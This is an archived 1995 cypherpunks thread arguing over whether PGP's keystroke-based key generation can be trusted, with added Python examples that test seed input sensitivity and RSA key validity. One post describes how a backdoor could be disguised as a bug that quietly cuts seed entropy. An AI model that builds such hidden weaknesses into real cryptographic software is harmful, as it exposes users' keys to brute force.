> > think that MIT and the NSA are above that sort of thing? All you have to
> > do is look at history, and it should be clear that this appeal to
> > authority is often used by those trying to cover things up.  If you know
> 
> I DO NOT GET PAID FOR ANY WORK I DO ON PGP!  I HAVE NEVER RECEIVED A
> DIME FOR MY WORK.  I WORK ON PGP BECAUSE I BELIEVE IN IT.  Having said
> that, I cannot BELIEVE you would have the Balls to say that the NSA
> has bought me.  Go re-read what you've said.  You have just said that
> the MIT PGP team, through MIT, is bound to be covering something up
> because of historical fact.  

I think that you miss the point.  If you worked for the NSA, you would
probably say this as well.  The point is that, for the purposes of
looking at the security of PGP, we should assume that you have evil
intent, whether you do or not.

I didn't say that the NSA bought you.  I asked " Why (specifically)..."
The question mark at the end is a dead give-away.  It is factually
accurate that government agencies have gotten the cooperation of
academics in the past to carry out subversions in order to further their
goals.  I asked "Do you somehow think that MIT and the NSA are above
that sort of thing?"  You apparently do, but history tells us that it is
imprudent to do this.

So if there has been a failure in communications in this respect, I
apologize for not making it as clear as I might have.  If you feel
personally slighted, I am sorry that you feel this way.  Nevertheless, I
believe that it is prudent to believe that the NSA has "bought you" for
the purpose of assessing the security of PGP and to ask the question
"Why (specifically) do you think so?"

> I have never said "Believe me when I said PGP is secure".  I have
> continually asked for you to check on the security yourself.  But you
> have continually refused to do that, and asked why it is secure!  So,
> you refuse to look for yourself, and you refuse to believe it when you
> are told.

I have not refused to do any such thing.  I have had a copy of PGP for
quite some time, but it is too large and complex for me to verify by
hand, and I know of no automated technique that can do the job in any
reasonable amount of time.  I was probably wrong to assume that this was
obvious.

>  So, what the hell do you want?  Do you want a line-by-line
> examination of the code????  Sheesh!

I think it would be prudent to do and publish a line-by-line walkthrough
of the source of PGP (although not to the whole list please).  You
should be trying to prove properties such as the non-interference of any
of the rest of the code with the key generation (or other) algorithms. 
This may be done by an information flow analysis similar to what was
done on our secure W3 server.  It would also be prudent to perform
adequate tests of the properties of inputs from people to determine the
true information content of the seeds and to publish these results so
they can be critiqued.  Perhaps it would also be valuable to have the
members of this list contribute ideas about properties they think would
be worth verifying.

> > It cannot be safely assumed that any program is clean or that any one
> > person or group is not involved with intentionally subverting security.
> > That violates the fundamental principles of information protection.
> 
> You're right, which is why the source code is publicly available.  I
> would wholeheartedly agree with you if only binaries are shipped, but
> the source is available.  Anyone can look through and verify the code.
> Anyone can try to find weaknesses.  In fact, everyone is encouraged to
> do so.  I don't see how _this_ "violates the fundamental principles of
> information protection".

The problem is that merely shipping however many lines of source code
does little to demonstrate its propriety.  A publicly posted version of
the source for IRC, for example, had an obvious Trojan horse that wasn't
detected for more than 6 months and was actively being used to attack
systems over the entire period.  In order to assess the source code, it
is necessary to also publish appropriate demonstrations of WHY it is
secure.
 
> > You might be, but even if you are not, that doesn't mean there are no
> > back doors.  Your inability to detect a backdoor gives me little
> > confidence, since this is at least an NP-complete problem and, with all
> > due respect, today, nobody can prove that PGP is free of backdoors
> 
> I think I've finally figured out where you are completely confused!!!
> You are confusing "back door" with "bug".  FYI: A back door is usually
> a means to make it easy for someone to get into a system.  For
> example, if I put in code so that I could read every PGP message by
> typing the passphrase "Setec Astronomy", that would be a backdoor.
> The fact that httpd was exploitable, or sendmail holes, or etc. are
> BUGS, not Back doors.

But don't you see? If I introduce a subtle backdoor and make it look
like a bug, I have plausible deniability.  Since I, as an independent
observer, cannot tell whether the hole is intentional or accidental, I
should, for the purposes of considering security, assume that it is
intentional. 

> Your problem is that you are using these terms interchangeably.  THEY
> ARE NOT THE SAME.  Putting in a backdoor has the connotation of
> intent.  A bug is an accidental occurrence that was a side effect of
> poor coding, a typo, carelessness, confusion, inconsistency, etc.  A
> back door, on the other hand, is a DELIBERATE ATTEMPT TO REDUCE OR
> CIRCUMVENT SECURITY!

But how can I, as an independent observer, tell if it is an accident or
a cleverly intentional subversion? I cannot look into your brain and
tell the difference, and no statement you make can reasonably convince
me.  They may not be the same, but they are not differentiable by an
independent observer.  From a scientific point of view, they are the
same.  From a humanistic point of view they may be different.

> > "...Choosing random quantities to foil a resourceful and motivated
> > adversary is surprisingly difficult.  ...recommends the use of truly
> > random hardware techniques and shows that the existing hardware on many
> > systems can be used for this purpose."
> > 
> > PGP does not use "truly random hardware techniques"
> 
> > Oh?  It doesn't?  How can you say that?  In what way does it not do
> this?  The RFC states, in your quote, that "existing hardware on many
> systems can be used" for truly random hardware techniques.  Please,
> substantiate your claim that PGP does not do this.  Show me code
> segments which show it does not.  Show me an analysis that goes
> contrary to the RFC.

You have it backwards.  You show me that the techniques you claim to be
truly random are indeed that.  Supposedly random number generators have
been created for many years, and plenty of them have been broken after
many years of being held to be secure with the algorithm and the full
details available for all to see.

> > But the RFC acknowledges that these methods are highly suspect and should
> > not be trusted.
> 
> You're right, it should not be blindly trusted.  Go read the code and
> examine the algorithms to prove to yourself that it is secure.  I've
> done that to the extent that I wish, and I believe it is secure.  But
> > you won't take my word for it, so go ahead and check!  Oh, wait, you
> > won't do that either.  Sorry.  I forgot.

But I cannot prove that it is secure.  In fact, I believe that it is not!

> > How is it "unscholarly, unprofessional, needlessly personal, and just
> > plain insulting" to question the idea that hundreds of thousands of
> > people are trusting their freedom to software that is probably not
> > secure? I think it is highly unprofessional to try to claim that PGP is
> > secure and to try to bolster that position by claiming that some
> > "Request for Comments" supports it when that same said RFC refutes it.
> 
> Show me some proof that PGP is "probably not secure"?  Come on, there
> is a finite probability that I can walk through a wall!  The laws of
> quantum probability give me this finite probability!  But I'd be hard
> pressed to show you that I can walk through the wall.  It looks good
> on paper, but it just ain't gonna happen.

That's exactly what the Germans said about the Enigma and others have
been saying about cryptosystems for the past 4,000+ years.  They have
been shown wrong again and again, and as a result, people like me want
more than just an "I believe it's secure".

> As for the RFC, it does not refute that PGP is secure.  In fact, PGP
> pretty much follows the RFC's guidelines.  You clearly have selective
> reading.  A useful skill -- I should learn it.

It takes years of practice.

> > It has been my general impression that "scholarly" means, among other
> > things, questioning the status quo and finding out where the generally
> > accepted ideas break down.  I am a professional in the field of
> > information protection, and I consider it highly unprofessional in this
> > field to assume that systems are secure without ample evidence to
> > support it.
> 
> Don't forget that you have to run PGP in some OS.  Please show me a
> secure OS!  Given that the OS cannot be secure (using your logic it is
> intuitively obvious that this is true) then how can you ask to see a
> program any more secure than the environment in which it runs?  PGP
> tries to be as secure as possible given the environment in which it is
> being run.

I agree that it is often easier to break into the computer to get the
keys than it is to break the cryptosystem.  That was my next bone to
pick with PGP - the way it stores the keys.  But I'll save that for
another day. 

> > So far, I see no ample evidence to support the security of PGP's key
> > generation algorithm relative to the concerns I have expressed.  Those
> > concerns are fairly specific as far as I am concerned, but if you feel I
> > have to demonstrate a specific attack that works in order to question
> > the adequacy of protection, I think you have it backwards.
> 
> No, your concerns have been utterly vague.  The closest you've come to
> being at all specific is some vague notion of analyzing keystrokes.
> In every message I've responded to, I've asked you to expand upon what
> you mean.  What kind of analysis do you mean?  How do you propose to
> analyze keystroke timings?  Even if you have a probabilistic model of
> keystroke timings, all you can possibly do is compare two different
> probabilities to see if they are the same.  But that doesn't help you
> limit the search on keys.

For example, you can generate the most probable 10^40 or so input
sequences, do key generation, and test against them to find out if the
user's key is one of them.  The question I am posing could be considered
as a question of the information content of the original input to PGP's
key generation process.

How could this be subtly altered by a person responsible for maintaining
PGP or detected and not repaired by same? For example, a loop index
could be calculated incorrectly by having a different part of PGP
overwrite the loop index using an incorrect pointer conversion.  Then the
loop that uses all of the input bits would be subtly altered so as to
use fewer of them.  The results would still look random but the total
search space would be reduced to the point where a good supercomputer
could run through it in only a few hours.

> > If the people at MIT feel personally insulted because I have questioned
> > their previously accepted ideas, it's just too bad.  I didn't say they
> 
> I'm not insulted that you are questioning PGP.  I am insulted because
> in every message you have sent, you have postulated some conspiracy
> with the government or postulated some intentional weakening of PGP.

And history tells us that the U.S.  government does this quite often. 
They are actively trying to harass PGP's author using a variety of what
could be reasonably called dirty tricks, they are actively trying to
prevent the use of good cryptography in the US, and they are actively
trying to make certain uses of cryptography illegal.  Why should I
believe that they would not also try to subvert PGP?

> Your statements could almost be construed as libelous, which is why I
> feel insulted.  I feel extremely comfortable with people questioning
> the security of PGP.  What I don't like is someone stating that it is
> not secure, claiming some sort of back door (which connotes some
> intent to reduce the security) and does not back up the claim with any
> proof.

What I don't like is people that state it is secure but can't back it up
with real facts.  Why (specifically) do you believe PGP is secure?
Forget your ego and the posturing about how you are not working for the
NSA and come up with a really good demonstration of the reason PGP is
secure, and I will be very quick to commend you.

...
> Ok.  Please explain what kind of keystroke timing analysis you
> propose, and I will attempt to answer that, or concede your point.

Fair enough.  A useful first step would be to demonstrate the real
information content of the keystrokes and timings entered by the user
across a reasonable number of different platforms, users, and trials.
That would start to address the potential that there is a fundamental
mistake in (or intentional corruption of) the input process.

The demonstrations described earlier would also be worthwhile in
demonstrating the lack of subtle interaction among the parts of PGP (I
refer to the information flow analysis).

After that, you should solicit other ideas from as wide an audience as
possible to see what sorts of properties should be considered for this
sort of program, and go about picking the most important ones first, and
so on.  I would be happy to discuss further details off-line.

> > 	OR come up with another alternative that doesn't ignore my question,
> > 	doesn't avoid the issue, doesn't appeal to authority that fails to
> > 	adequately support your contentions, and doesn't claim that I am
> > 	somehow unprofessional or scholarly for questioning an unproven
> > 	contention.
> 
> Have you heard the thought experiment of putting a back-door in login
> by modifying the C compiler to modify the C compiler to modify login?
> Think about that in terms of the security of PGP -- you are always
> going to be limited in security to the security of the system on which
> you are running.

Not a thought experiment, the Turing award paper in 1984 - came out just
a little bit after the IFIP conference in which computer viruses were
first publicly described and analyzed. 

> I only believe you are being unscholarly because you are making claims
> without any supporting evidence.  _THAT_ is unscholarly!

I think there is good supporting historical evidence for my questions.
But I don't believe I have made any "claims".

...

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
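
The failure mode described in the message above (a loop that silently consumes fewer input bits while the output still looks random) is the kind of defect an input-sensitivity regression test catches. The following is an added example, not code from PGP or from anyone in this thread; derive_seed, derive_seed_truncated, the SHA-256 mixer and the sample bytes are hypothetical stand-ins constructed for illustration.

```python
import hashlib

# Constructed sample standing in for 16 bytes of collected keystroke data.
SAMPLE = bytes(range(16))


def derive_seed(sample):
    """Reference behaviour: every collected byte is mixed into the seed."""
    mixer = hashlib.sha256()
    for i in range(len(sample)):
        mixer.update(sample[i:i + 1])
    return mixer.digest()


def derive_seed_truncated(sample, limit=4):
    """Constructed defect: the loop bound has been clobbered to `limit`,
    so only the first few bytes of the sample reach the mixer."""
    mixer = hashlib.sha256()
    for i in range(min(limit, len(sample))):
        mixer.update(sample[i:i + 1])
    return mixer.digest()


def ones_in(digest):
    """Number of 1 bits in a digest (crude check of how random it looks)."""
    return sum(bin(byte).count("1") for byte in digest)


def dead_input_bits(derive, sample):
    """Flip each input bit in turn; return the positions whose flip leaves
    the derived seed unchanged, i.e. bits that never reach the output."""
    baseline = derive(sample)
    dead = []
    for bit in range(len(sample) * 8):
        flipped = bytearray(sample)
        flipped[bit // 8] ^= 1 << (bit % 8)
        if derive(bytes(flipped)) == baseline:
            dead.append(bit)
    return dead


def effective_input_bits(derive, sample):
    """Upper bound on how many input bits can influence the seed."""
    return len(sample) * 8 - len(dead_input_bits(derive, sample))


if __name__ == "__main__":
    for name, derive in (("reference", derive_seed),
                         ("truncated", derive_seed_truncated)):
        print("%-9s ones in seed: %3d/256   input bits reaching seed: %3d/%d"
              % (name, ones_in(derive(SAMPLE)),
                 effective_input_bits(derive, SAMPLE), len(SAMPLE) * 8))
```

Both seeds pass the crude bit-count check, but only the flip test shows that the truncated version depends on 32 of the 128 input bits. The test bounds which bits can matter; it says nothing about how unpredictable those bits were when typed.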



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 05:19:42 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <9508010821.AA20913@cs.umass.edu>
Message-ID: <9508011212.AA17103@all.net>
MIME-Version: 1.0
Content-Type: text


> > PGP does not use "truly random hardware techniques"
> 
> Correct. However, the excerpt of RFC 1750 you quoted above does not claim
> that all PRNG techniques are unreasonably insecure, nor does it suggest that
> they should never be used.

Nor do I.

> > "...For the present, the lack of generally available facilities for
> > generating such unpredictable numbers is an open wound in the design of
> > cryptographic software. ... the only safe strategy so far has been to
> > force the local installation to supply a suitable routine to generate
> > random numbers. To say the least, this is an awkward, error-prone and
> > unpalatable solution." - 1994 - after PGP was implemented.
> 
> I agree with the RFC's authors that mandating provision of platform-
> dependent routines is an awkward and unappealing strategy. Note, however,
> that they characterize it as "the only safe strategy". They say that the
> _strategy_ is error-prone; they do not say that all locally-supplied
> routines are unreasonably insecure, and should not be used.

But in practice, PGP is not used this way by the masses.  They use standard
distributions without alteration.

...
> > So I guess the RFC supports my contention and not [Derek Atkins'].
> [...]
> [re: PGP's key generation methods]
> > But the RFC acknowledges that these methods are highly suspect and should
> > not be trusted.
> 
> Where ?  Give a citation, please. It doesn't say anything of the sort in
> the part you quoted previously. Furthermore, you inexplicably omitted all
> mentions of keystroke-timing PRNG techniques in RFC 1750. Here are some
> excerpts that strike me as particularly germane to the quality of the
> randomness in PGP:

That is my interpretation, however, reasonable people may differ...

> ------------------------------------------------------------------------
> 4.2 Timing and Content of External Events
> 
>    It is possible to measure the timing and content of mouse movement,
>    key strokes, and similar user events.  This is a reasonable source of
>    unguessable data with some qualifications. On some machines, inputs
>    such as key strokes are buffered.  Even though the user's inter-
>    keystroke timing may have sufficient variation and unpredictability,
>    there might not be an easy way to access that variation.  Another
>    problem is that no standard method exists to sample timing details.
>    This makes it hard to build standard software intended for
>    distribution to a large range of machines based on this technique.
> 
>    The amount of mouse movement or the keys actually hit are usually
>    easier to access than timings but may yield less unpredictability as
>    the user may provide highly repetitive input.
> [...]

Sounds like this is not very random - I agree that "the user may provide
highly repetitive input".  Just because one type of input is more
repetitive, doesn't make the other truly random.

...
> I find it difficult to reconcile your claim that "the RFC acknowledges
> that these methods are highly suspect and should not be trusted" with the
> RFC's assertions that:
> 
> 	"the timing and content of [...] key strokes [...] is a reasonable
> 	 source of unguessable data"

You left out "with some qualifications".  This is the part where I have concern.

> 	"the timing and content of requested `random' user keystrokes can
> 	 yield hundreds of random bits"

You missed the "but conservative assumptions need to be made" part.  Hundreds
of random bits are possible, but how many actual bits of content are contained in
PGP input?

> 	"this strategy may make practical portable code to produce good
> 	 random numbers for security"

You missed the "However, it may still fail against a high grade attack
on small single user systems, especially if the adversary has ever been
able to observe the generation process in the past.  A hardware based
random source is still preferable." part and your reliance on the term
"may" as "does" is overly optimistic.

> Having said that, allow me to state my position on some of the other
> issues you've raised. I do not _know_ nor can I _prove_ that PGP has
> no cryptographic backdoors. I happen to _believe_ that it does not --
> among other things, I have met Derek Atkins and Jeff Schiller, and I
> trust them in this regard. I don't consider that any reason for you to
> believe that it's backdoor-free. In fact, I'm not interested in trying to
> persuade you or anyone else that it is backdoor-free. By the same token,
> I don't see any reason for anyone here to heed your demands that they
> justify _their beliefs_ to _your satisfaction_. 

Not demands - questions.  Why is it that you are unwilling to take
questions as questions and instead translate them into demands? You
could have answered my questions without all the other side comments. 
Why didn't you? I interpret this as being defensive, which means to me
that you are not as sure as you outwardly indicate and that there may be
some lingering issues.  So I ask more questions.  You respond with more
posturing and fewer answers, so I become even more concerned.

It's probably my fault for not asking them in the way you are used to
hearing them, or maybe we are all over-sensitive about our work.

> I remain rather baffled as to your motives in this mini-campaign. You said
> that no-one can prove PGP has no backdoors, and many here essentially said
> "what else is new ?". In the white paper about your small "secure" HTTP daemon,
> thttpd, (found at http://all.net/ManAl/white/whitepaper.html, to save you the
> trouble of more self-promotion ;), it says:
> 
> > Proof of program correctness to verify even simple security
> > properties, for example, grows almost exponentially with the number of 
> > program statements. Verifying a 100 line limited-language program for the
> > simple security properties associated with the Bell-LaPadula model of
> > security takes about 24 hours of CPU time on a Cray supercomputer. The 
> > source code for the NCSA W3 server in widespread use today is about 6600
> > lines long, so there is no computer around today that is likely to be able
> > to verify its security (or more likely demonstrate its insecurity).

Which is why we need very small programs (which PGP is not) that do the
security-critical functions.  We can then analyze these programs and
determine many important properties with regard to their security, which
we cannot do with PGP.

> If we adopt this standard, it seems hopeless to "verify" the PGP source, as
> others have noted here. [BTW, I read your detailed code walkthrough for
> thttp with interest, and commend your work on that. I'm planning some
> sort of similar review for a larger piece of code, and it's encouraging
> to see other people pulling it off.]

Thank you, but I think it may be too hard to do for a much larger piece
of code.  There is another gentleman who is now working on formally (and
automatically) verifying these properties.  Perhaps his results will be of
value in your problem and similar problems for other programs.

...

> [On a largely unrelated note, why does http://all.net/admin/usepolicy.html
> contain the following warning ?  Specifically, why the age limit ?
> 
> 	"This service is ONLY for use by legally competent adults human [sic]
> 	 individuals of age 18 or older. If you do not meet these criteria, 
> 	 you should immediately cease and desist your use of this service."]

I think that some of the popular literature sections may be considered
pornography (Fanny Hill, the Kama Sutra, etc.) and in order to comply
with the applicable laws, I thought it would be prudent to warn off our
fragile youth.

> "...because of Dr. Cohen's frequent, blatant, and intentional disregard for
>  the guidelines that this list operates under, and because of his apparent
>  disregard for the frequently expressed opinions of many of the members of
>  this list that they don't appreciate his antics, I've configured Majordomo 
>  to divert all messages he posts to Firewalls to the list owner for review 
>  and approval before posting..." -Brent Chapman, July 24, 1995

And if enough of those on this list feel that this discussion and my postings
are too commercial or too abusive to take, I am certain that Brent will send
you a free copy of his Fred filter.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 1 Aug 95 06:59:24 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <199508011359.IAA20397@edison.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>How is it "unscholarly, unprofessional, needlessly personal, and just
>plain insulting" to question the idea that hundreds of thousands of
>people are trusting their freedom to software that is probably not
>secure? I think it is highly unprofessional to try to claim that PGP is
>secure and to try to bolster that position by claiming that some
>"Request for Comments" supports it when that same said RFC refutes it.
...
...
>As far as the potential that they are working with the NSA to subvert
>personal privacy, it is a potential, just as it is a potential that I am
>working with the NSA to undermine confidence in PGP.  The issue is and
>should be, why (specifically) do you believe that PGP is secure.

Here you go again. "Probably not secure". Earlier you make implications
of trap doors.  The only way for a trap door to be there, would be if
one of the authors put it there. Otherwise, you would be suggesting
that one dark night, on a new moon, the NSA snuck in to MIT, changed
the source code, inserted a back door, and snuck out without anybody
being the wiser.  Implying there is a trap door is much different than
implying there may be a flaw in the code itself that allows a security
breach.

I agree with Matt's assessment on your behavior Fred. Your statements
lead me (among others) to believe that you think that one or more
of the authors are not trustworthy and have tampered with the code
to insert trap doors. His remarks on your statements being near-defamatory
hit mighty close to home for this on-looker. I'm sure I'm not alone.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 1 Aug 95 10:16:14 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Currency risk on bank accounts
In-Reply-To: <199508010621.XAA28791@ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950801094410.11495B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 31 Jul 1995, Bill Stewart wrote:
> Some of the Channel Island banks offer accounts with ATM cards;
> I think some of them are in Jersey (you don't have to remind people
> you didn't say _New_ Jersey :-)

Banks most any place in the world can do the same.  You can get
ATM cards from banks in Europe and Asia and probably Africa and
Latin America that use the PLUS or Cirrus(sp?) system.  You can
open an account by mail at most of them.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@alias.com>
Date: Tue, 1 Aug 95 07:04:20 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Stopped at the boarder
In-Reply-To: <9508010351.AA18289@all.net>
Message-ID: <9508011001.ZM17072@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 31, 11:51pm, Dr. Frederick B. Cohen wrote of his experiences at
the Canada-USA border:
>  They looked at every slide, checked out
> the bags themselves for secret compartments, but the one thing they
> didn't do was check the contents of my floppy disks.  Isn't technology
> wonderful?

Until a few years ago, carrying software across the border from the states
to Canada, one would only pay duty on the value of the media. Canadian
Customs regulations did not recognise any value in the information
contained on the floppies. I haven't actively exported/imported software
in this manner recently (well, I carried 2.6ui to Mobile and back without
realising it (or, indeed, ever putting it in a drive) and so broke ITAR)
so I'm not sure how things stand currently.

I think they might actually have been convinced of the value of software.
[Department of External Affairs and International Trade has been, as noted
earlier. Danger of software, at least.]

frodo =)

-- 
Richard Martin 
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@alias.com/g4frodo@cdf.toronto.edu       http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 1 Aug 95 09:59:52 PDT
To: cypherpunks@toad.com
Subject: BOOK: "Artificial Intelligence: A Modern Approach"
Message-ID: <ac43aa670b021004432b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



On a lighter note, I've recently gotten a new book, "Artificial
Intelligence: A Modern Approach," by Stuart Russell and Peter Norvig, 1995,
Prentice-Hall, ISBN 0-13-103805-2.

In 900 pages of well laid-out text, with excellent use of typography to
make finding topics easy, it seems to be a great compendium of methods
loosely called "AI."

AI has gotten a bad rap, perhaps deservedly after the hype of the mid-80s,
but the methods are useful for various purposes.

This book is focussed on "agents," and lots of code fragments are available
(in Common Lisp) for actual construction of agents. Topics that relate to
Cypherpunks are scattered throughout the text, including stuff on planning,
provably correct designs, game theory, simulations, neural nets, belief,
and ontology. Lots more stuff, too. (If I were writing a formal book
review, I'd say more. But this is just a pointer, so that interested folks
can check it out at their local technical bookstore or university library.)

Not a lot to do with getting PGP 3.0 out the door, and not a lot to do with
building remailers, but stuff I find interesting.

Let a thousand flowers bloom.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Tue, 1 Aug 95 02:17:47 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <9508010120.AA07073@all.net>
Message-ID: <Pine.SOL.3.91.950801100122.1688D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:

> A reasonable response.  My question is: Why do you think that the key
> generation algorithm used by PGP is secure? Specifically, how do we know
> there is no subtle back door that reduces the problem of testing the
> typical key space to a solvable problem in today's technology?

Well I told you that I verified the results of the key generation in PGP 
by testing the primality of p and q and the validity of the key by 
testing ed = 1 mod (p-1)(q-1).  That bit works, period.

You seem to be in some doubt about the random starting point for the prime
searching.  Entropy for the random number generator is collected from the
user's keystrokes and is mixed into the random pool.  PGP is very careful
about how much entropy it attaches to one keystroke and makes sure that
the user is prompted to press more keys if it thinks it has not got
enough.  The random pool is itself stirred periodically by using MD5 to
"encrypt" it.  This encryption is made strictly one way by using the first
64 bytes of the pool as the key, these 64 bytes are destroyed after use. 

Now, amongst other times the pool is stirred both before and after use.  
So, recovering any given state of the pool (i.e. finding the random 
starting point for a prime search) has to be equivalent to reversing the 
MD5 transform.  There is no known way to do this.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+
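
The checks described in the message above (primality of p and q, and ed = 1 mod (p-1)(q-1)), written out as an added example that is not part of the original post and not PGP's code. The key is constructed here from two well-known Mersenne primes, and every function and constant name is illustrative.

```python
"""Added example: consistency checks on an RSA key (constructed test key)."""
from math import gcd

# Fixed Miller-Rabin witnesses: the first twelve primes give a deterministic
# answer for every n below about 3.3e24. For real key sizes the same loop is
# only a probabilistic test and random witnesses should be added.
WITNESSES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_prime(n):
    """Miller-Rabin primality test with the fixed witness set above."""
    if n < 2:
        return False
    for w in WITNESSES:            # cheap trial division first
        if n % w == 0:
            return n == w
    d, s = n - 1, 0                # write n - 1 as d * 2**s with d odd
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in WITNESSES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False           # a proves that n is composite
    return True


def check_rsa_key(p, q, e, d, n):
    """Return a list of problems found; an empty list means all checks passed."""
    problems = []
    if not is_prime(p):
        problems.append("p is not prime")
    if not is_prime(q):
        problems.append("q is not prime")
    if p == q:
        problems.append("p equals q")
    if p * q != n:
        problems.append("p*q != n")
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        problems.append("e shares a factor with (p-1)(q-1)")
    # Strict form of the test quoted in the post. A d reduced modulo
    # lcm(p-1, q-1) also decrypts correctly but would be reported here.
    if (e * d) % phi != 1:
        problems.append("ed != 1 mod (p-1)(q-1)")
    # Functional check: encrypt then decrypt a few sample values.
    for m in (2, 0x1234567, n - 2):
        if pow(pow(m, e, n), d, n) != m:
            problems.append("encrypt/decrypt round trip fails")
            break
    return problems


# Constructed key for the demonstration (far too small for real use).
P = 2**61 - 1                      # Mersenne prime
Q = 2**31 - 1                      # Mersenne prime
E = 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # modular inverse, Python 3.8+

if __name__ == "__main__":
    print("good key:", check_rsa_key(P, Q, E, D, N))
    print("wrong d: ", check_rsa_key(P, Q, E, D + 1, N))
```

These checks confirm that a finished key is well formed; they say nothing about how unpredictable the starting point of the prime search was, which is the separate question the rest of the message addresses.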





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Tue, 1 Aug 95 02:32:52 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <9508010120.AA07073@all.net>
Message-ID: <199508010932.KAA11464@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>A reasonable response.  My question is: Why do you think that the key
>generation algorithm used by PGP is secure? Specifically, how do we know
>there is no subtle back door that reduces the problem of testing the
>typical key space to a solvable problem in today's technology?
>
>I don't believe I made ANY "vague, wild, unsupported claims" however,
>that is certainly a matter of opinion.
>
	OK, let me put my 2 pence collaboration:

	Let's see. I can try to write a nice program to protect myself.
I could XOR something with my key (00000000) and use that. Then tell my
fellows and all of us use the same program.

	Or I could even be more tricky and implement something more complex.

	Now, my knowledge, time and resources are limited. I see that MIT
or whomever has made a program that, under test, is more secure than my
XOR 00000000 implementation. I may not fully trust them but it is better
than anything I could come out with.

	So, my position is: if it's the best thing I have access to, I only
have two options: either I use it or I give up with cryptography at all.
Right?

	Now, I think that what I am trying to say is: if you can come up
with something better, please do. All the Free (and Wannabe Free) World
will be eternally grateful to you. If you can't, then you only have the
above two options.

	Bragging about hypothetical fears that you can't demonstrate at all
is not only stupid, it is also pessimistic, destructive, unproductive and
threatening all kinds of freedom. Nazi perhaps? Dunno. And I don't care.

	Security? As you have already been told, you can only prove it
negatively. So, since you can only prove that it can fail, but can't prove
it can't, any discussion is irrelevant unless you have any real proof.

	All the process is based in a fight against time: you are assuming
that nobody can break your crypto process before the secret becomes irrelevant.
All your security lies in the fact that *YOU* don't know of anybody that 
can break the problem but can't deny that  someone could ever possibly 
discover a clever algorithm.

	Thus: either you have proofs that it can be broken, or know a better
algorithm, or can name someone who can prove s/he can break it, or you just
trust it the best you can. Any other kind of discussion is a sophism.

	Dr?... hum. Let me try then a different analogy: I do have a patient
with a lethal disease with no known therapy. Then someone comes up with A,
which cures people, but -being new- could maybe possibly perhaps have some
secondary effect that no one knows yet and can't be demonstrated (but could
exist). Now, should I trust the lives of my patients to therapy A or should
I wait for some years to be secure it has no secondary effects?. Even so,
since the fact nobody has reported them doesn't mean it could not have
them (only that nobody has discovered them), I can't be 100% sure.

	Oh, well, I guess that if your doctor never gave you a therapy 'cos
you can never be 100% sure, you would not like the idea. Would you trust
your life to that therapy when you know for sure you are about to die if
you don't? What if A saved 100%, but there was a therapy B that saved 20%
with no known secondary effects either? Which one would you choose?

	Thus, can you trust lives and whatnot to something not fully known?
I'd say that unless you have something better, that's your better bet. So,
since you know for sure that if you don't use any cryptography at all, you
must communicate in the clear, what do you do?

	So, can you come up with something better or not?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
